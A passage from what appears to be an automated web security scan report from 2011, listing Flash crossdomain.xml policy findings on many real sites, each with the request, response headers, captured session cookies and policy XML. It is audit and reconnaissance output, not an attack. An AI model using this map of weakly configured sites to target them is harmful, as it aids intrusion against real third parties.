Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:30:34 GMT
Connection: close
Content-Length: 215

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" />
</cross
...[SNIP]...

7.323. http://www.woodsmith.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.woodsmith.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.woodsmith.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:49 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2010 21:12:58 GMT
ETag: "fb8007-a3-4940445c28a80"
Accept-Ranges: bytes
Content-Length: 163
X-Internal-Server: web3
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.augusthome.com" />
</cross-domain-policy>

7.324. http://www.yachtingmagazine.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.yachtingmagazine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yachtingmagazine.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:17:02 GMT
Server: Apache
Set-Cookie: SESS21a48a1dfa75a5e0513f994dbbbab42e=1f0dlubcq8dthoccjq5c4k0pb4; expires=Fri, 27-May-2011 06:50:22 GMT; path=/; domain=.yachtingmagazine.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 03:17:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Length: 365
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4b D=180442
Content-Type: text/xml
Content-Language: en

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.yachtingmagazine.com" />
...[SNIP]...
<allow-access-from domain="*.www.yachtingmagazine.com" />
<allow-access-from domain="drupal" />
<allow-access-from domain="*.drupal" />
...[SNIP]...

7.325. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:04 GMT
Server: hi
Status: 200 OK
Last-Modified: Fri, 22 Apr 2011 17:23:16 GMT
Content-Type: application/xml
Content-Length: 561
Set-Cookie: k=173.193.214.243.1304470444175048; path=/; expires=Wed, 11-May-11 00:54:04 GMT; domain=.twitter.com
Cache-Control: max-age=1800
Expires: Wed, 04 May 2011 01:24:04 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

7.326. http://www.acorn-online.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acorn-online.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.acorn-online.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:09 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 16 Aug 2008 00:16:16 GMT
ETag: "2b4a097-90-45488a583b400"
Accept-Ranges: bytes
Content-Length: 144
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="www.acorn-online.com" />
<allow-access-from domain="acorn-online.com" />
</cross-domain-policy>

7.327. http://www.blanchardonline.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blanchardonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blanchardonline.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:50:19 GMT
Server: Apache/2.2.17 (FreeBSD)
Set-Cookie: symfony=be474a986b48139377dbf00fd8ab3484; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 308
Connection: close
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="cdn.blanchardonline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="scripts.blanchardonline.com" secure="false" />
...[SNIP]...

7.328. http://www.bonatireview.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bonatireview.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bonatireview.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 09 Dec 2010 14:06:25 GMT
Accept-Ranges: bytes
ETag: "ed338044aa97cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:20:47 GMT
Connection: close
Content-Length: 278

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.bonatireview.com"
...[SNIP]...
<allow-access-from domain="bonatireview.com" />
...[SNIP]...

7.329. http://www.boweryballroom.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boweryballroom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.boweryballroom.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:47:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 06 Mar 2010 15:49:19 GMT
Accept-Ranges: bytes
Content-Length: 1082
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="www.bowerypresents.com" />
<allow-access-from domain="bowerypresents.com" />
<allow-access-from doma
...[SNIP]...
<allow-access-from domain="boweryballroom.com" />
<allow-access-from domain="www.mercuryloungenyc.com" />
<allow-access-from domain="mercuryloungenyc.com" />
<allow-access-from domain="www.musichallofwilliamsburg.com" />
<allow-access-from domain="musichallofwilliamsburg.com" />
<allow-access-from domain="www.terminal5nyc.com" />
<allow-access-from domain="terminal5nyc.com" />
<allow-access-from domain="www.wellmonttheatre.com" />
<allow-access-from domain="wellmonttheatre.com" />
<allow-access-from domain="houselist.bowerypresents.com" />
   <allow-access-from domain="dev.bowerypresents.com" />
   <allow-access-from domain="bp1.6:8888" />
   <allow-access-from domain="www1.bowerypresents.com" />
   <allow-access-from domain="www.bowerypresents.com.php5-5.dfw1-2.websitetestlink.com" />
...[SNIP]...

7.330. http://www.celebridoodle.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebridoodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.celebridoodle.com

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web020
X-Webserver: oak-tp-web020
Vary: cookie
Expires: Wed, 04 May 2011 05:57:07 GMT
Last-Modified: Fri, 21 May 2010 16:22:30 GMT
Content-Disposition: inline; filename=crossdomain.xml
Content-Type: text/xml
Keep-Alive: timeout=300, max=100
Content-Length: 468
Date: Wed, 04 May 2011 02:09:39 GMT
X-Varnish: 1768661650 1767879073
Age: 752
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="www.twitter.com" />
<allow-access-from domain="twitter.com" />
<allow-access-from domain="www.celebrifeed.com" />
<allow-access-from domain="celebrifeed.com" />
<allow-access-from domain="www.friendtrain.com" />
<allow-access-from domain="friendtrain.com" />
...[SNIP]...

7.331. http://www.chatforfree.org/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chatforfree.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chatforfree.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 30 Mar 2010 08:49:28 GMT
ETag: "2308ecf-371-b512f600"
Accept-Ranges: bytes
Content-Length: 881
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.familysfirst.org" to-ports="80,18001" />
...[SNIP]...
<allow-access-from domain="familysfirst.org" to-ports="80,18001" />
...[SNIP]...
<allow-access-from domain="www.teen-video-chat.com" to-ports="80,18001" />
...[SNIP]...
<allow-access-from domain="teen-video-chat.com" to-ports="80,18001" />
...[SNIP]...
<allow-access-from domain="64.65.52.204" to-ports="80,18001" />
...[SNIP]...
<allow-access-from domain="chatforfree.org" to-ports="80,18001,38008" />
...[SNIP]...
<allow-access-from domain="64.65.32.218" to-ports="80,18001" />
...[SNIP]...
<allow-access-from domain="asianchatlive.org" to-ports="80,18001" />
...[SNIP]...
<allow-access-from domain="www.asianchatlive.org" to-ports="80,18001" />
...[SNIP]...

7.332. http://www.chieftain.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chieftain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chieftain.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2083212
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 01:17:53 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0375
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: chieftain.com
X-TNCMS-Served-By: cmsapp13
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.333. http://www.clickvue.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickvue.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clickvue.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:57:12 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 22 Apr 2009 17:35:05 GMT
ETag: "1b8781-178-2f192440"
Accept-Ranges: bytes
Content-Length: 376
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!-- https://clickvue.com/qv/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.hallcocu.org" secure="false"
/>
<allow-access-from domain="www.pelican-east.com" secure="false"
/>
...[SNIP]...
<allow-access-from domain="clickvue.com" secure="true"
/>
...[SNIP]...

7.334. http://www.cslplasma.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cslplasma.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cslplasma.com

Response

HTTP/1.1 200 OK
ETag: "72635deb158bcb1:d2e"
Accept-Ranges: bytes
Set-Cookie: CSLWTCOOKIE=173.193.214.243-1304474103.482; expires=Thu, 03-May-2012 01:55:03 GMT; path=/;
Set-Cookie: X-Mapping-fdgilpeb=4515722B61EC1EA7E566DCBD3B626A3C; path=/
Content-Length: 286
Date: Wed, 04 May 2011 01:55:03 GMT
Connection: close
Last-Modified: Tue, 23 Nov 2010 13:54:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>


<allow-access-from domain="www.cslbehring.com" />
<allow-access-from domain="cslbehring.com" />
...[SNIP]...

7.335. http://www.dailyjournalonline.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyjournalonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyjournalonline.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2078468
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 02:30:06 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0404
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: dailyjournalonline.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.336. http://www.donga.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.donga.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.donga.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:26 GMT
Server: Apache
Last-Modified: Tue, 06 Jul 2010 09:07:30 GMT
Accept-Ranges: bytes
Content-Length: 411
Content-Type: application/xml
Via: 1.1 jaguar01 (Jaguar/3.0-11)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.donga.com" />
<allow-access-from domain="etv.donga.com" />
<allow-access-from domain="reuters.donga.com" />
<allow-access-from domain="adimg.donga.com" />
<allow-access-from domain="ar.donga.com" />
...[SNIP]...

7.337. http://www.fiba.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fiba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fiba.com

Response

HTTP/1.0 200 OK
Content-Length: 1293
Content-Type: text/xml
Cache-Control: max-age=600
Last-Modified: Sat, 12 Dec 2009 13:39:09 GMT
Accept-Ranges: bytes
ETag: "cbbfbd7b307bca1:1821"
Server: Microsoft-IIS/6.0
ServerNode: www-31
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:35:12 GMT
X-Cache: HIT from cache-32.fiba.com
X-Cache-Lookup: HIT from cache-32.fiba.com:80
Via: 1.1 cache-32.fiba.com:80 (squid/2.7.STABLE6)
Connection: close

<cross-domain-policy>
<allow-access-from domain="www.fiba.com"/>
<allow-access-from domain="fiba.com"/>
<allow-access-from domain="cms.fiba.com"/>
<allow-access-from domain="www-31.fiba.com"/>
<allow-access-from domain="www-32.fiba.com"/>
<allow-access-from domain="www-33.fiba.com"/>
<allow-access-from domain="www-34.fiba.com"/>
<allow-access-from domain="ri-31.fiba.com"/>
<allow-access-from domain="mirror.www.fiba.com"/>
<allow-access-from domain="mirror.cms.fiba.com"/>
<allow-access-from domain="uft8.www.fiba.com"/>
<allow-access-from domain="utf8.cms.fiba.com"/>
<allow-access-from domain="www.2007lasvegas.fibaamericas.com"/>
<allow-access-from domain="fiba.qq.com"/>
<allow-access-from domain="www.fibatv.premiumtv.co.uk"/>
<allow-access-from domain="www.fibatv.com"/>
<allow-access-from domain="www.fiba2010turkey.com"/>
<allow-access-from domain="www.2010turkey.com"/>
<allow-access-from domain="fiba2010turkey.com"/>
<allow-access-from domain="2010turkey.com"/>
<allow-access-from domain="www.chennai2009.fibaasia.net"/>
<allow-access-from domain="chennai2009.fibaasia.net"/>
<allow-access-from domain="turkey2010.fiba.com"/>
<allow-access-from domain="www.turkey2010.fiba.com"/>
...[SNIP]...

7.338. http://www.fogu.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fogu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fogu.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:13 GMT
Server: Apache
Last-Modified: Mon, 19 Jan 2009 04:04:56 GMT
ETag: "35138030-115-460ce0688ca00"
Accept-Ranges: bytes
Content-Length: 277
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="www.fogu.com.com" />

<allow-access-from domain="fogu.com.com" />
...[SNIP]...

7.339. http://www.gnosis.org/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnosis.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gnosis.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:19:00 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 20:35:26 GMT
ETag: "3f124c0-fd-4d68128e"
Accept-Ranges: bytes
Content-Length: 253
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.gnosis.org" />
<allow-access-from domain="gnosis.org" />
...[SNIP]...

7.340. http://www.goac.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goac.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2086692
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 02:10:12 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0503
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: goac.com
X-TNCMS-Served-By: cmsapp8
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.341. http://www.greenevillesun.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenevillesun.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.greenevillesun.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:33:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9
Cache-Control: max-age=315360000
Expires: Sat, 01 May 2021 02:33:32 GMT
Content-Length: 151
Connection: close
Content-Type: text/html

<cross-domain-policy>
   <allow-access-from domain="www.greenevillesun.com" />
   <allow-access-from domain="greenevillesun.com" />
</cross-domain-policy>

7.342. http://www.hamptons.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hamptons.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hamptons.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:26 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 10 Jul 2009 21:12:15 GMT
ETag: "9a04f3-172-6d35c9c0"
Accept-Ranges: bytes
Content-Length: 370
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="http://hamptons.com" to-ports="80"/>
<allow-access-from domain="http://www.hamptons.com" to-ports="80"/>
<allow-access-from domain="http://www.northfork.com" to-ports="80"/>
...[SNIP]...

7.343. http://www.hanfordsentinel.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hanfordsentinel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hanfordsentinel.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2111096
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 03:56:58 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.042
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: hanfordsentinel.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.344. http://www.heraldstandard.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heraldstandard.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.heraldstandard.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2034752
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 03:19:14 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0197
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: heraldstandard.com
X-TNCMS-Served-By: cmsapp4
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.newyork1.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.345. http://www.hollywoodbowl.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hollywoodbowl.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hollywoodbowl.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:42:31 GMT
Server: Apache/2.2.13 (Win32) JRun/4.0
Last-Modified: Thu, 19 Nov 2009 00:06:19 GMT
ETag: "9000000000420-108-478ae20faa082"
Accept-Ranges: bytes
Content-Length: 264
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="www.laphil.com" />
   <allow-access-from domain="laphil.com" />
...[SNIP]...

7.346. http://www.hostesscakes.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hostesscakes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hostesscakes.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 16 Feb 2010 00:07:24 GMT
